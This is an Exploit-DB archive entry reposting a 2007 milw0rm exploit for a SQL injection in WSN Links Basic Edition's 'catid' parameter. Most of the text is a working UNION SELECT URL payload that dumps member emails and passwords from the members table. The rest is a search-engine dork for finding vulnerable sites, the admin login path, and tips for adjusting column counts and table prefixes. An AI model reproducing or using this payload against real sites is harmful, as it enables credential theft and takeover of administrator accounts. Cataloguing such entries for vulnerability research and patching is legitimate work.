WSN Links Basic Edition - 'catid' SQL Injection

EDB-ID:

4209

CVE:

2007-3981

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-07-21

Vulnerable App:

--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: wsnforum.com
DORK: Google: intext:"Powered by WSN Links Basic Edition"     Altavista: "Powered by WSN Links Basic Edition"


DESCRIPTION: 
pull out member info from the database


EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !



--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-21]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services